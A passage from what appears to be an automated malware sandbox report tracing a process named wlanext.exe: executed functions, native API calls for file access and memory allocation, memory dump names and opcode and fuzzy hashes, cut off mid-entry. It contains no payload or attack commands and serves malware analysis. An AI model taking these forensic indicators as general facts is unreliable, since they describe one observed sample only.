                                                                                                                                                        • Instruction Fuzzy Hash: 9F417CB2600605EFDB24DF68C885BBAB7B9FB44304F14C86DE95ADB252D774E940CB50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: wlanext.exe PID: 2756 Parent PID: 1388 wlanext.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00099D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                        • Instruction ID: 63cb80dc364295cf340fb5e817a82d429ee0f25d7d9631c0e925bfb349143eeb
                                                                                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                        • Instruction Fuzzy Hash: B8F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00099E8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: M
                                                                                                                                                        • API String ID: 3535843008-4211545630
                                                                                                                                                        • Opcode ID: a2d369eec825e5927d6dbdf51d168fb62880d39f20b28b61ca6b4a08c21d95ae
                                                                                                                                                        • Instruction ID: a445402b6be9d980c82f7478301d60c070599700f40cd66cdebb5ca33d34cd7b
                                                                                                                                                        • Opcode Fuzzy Hash: a2d369eec825e5927d6dbdf51d168fb62880d39f20b28b61ca6b4a08c21d95ae
                                                                                                                                                        • Instruction Fuzzy Hash: 08E08C76640214AFDB20DBA8CC85EDB7B68EF55390F154599F959AB242C130A5008BE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00099E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: M
                                                                                                                                                        • API String ID: 3535843008-4211545630
                                                                                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                        • Instruction ID: 38dda25029afe3172f76972a2fe7647abf86c968db1867b573677de5ec081c4c
                                                                                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                        • Instruction Fuzzy Hash: 06D012752002146BD710EB98CC85ED7775CEF44750F154455BA585B242C530F50086E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00099E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                        • Instruction ID: c1dbbdede6ca734d3b6ae3ff421215ba9194ca1b8af34a3d35a52b2938fa7461
                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                        • Instruction Fuzzy Hash: 38F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00099F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F79
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                        • Instruction ID: 7f7d3c63fc8a91ffcb1dfd4a579ead8bd4f3f7c587b654bacbd3ae9f6f840db4
                                                                                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                        • Instruction Fuzzy Hash: 57F015B2200208ABCB14DF89CC81EEB77ADEF88750F118148BE08A7241C630F810CBE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F700C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F707AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
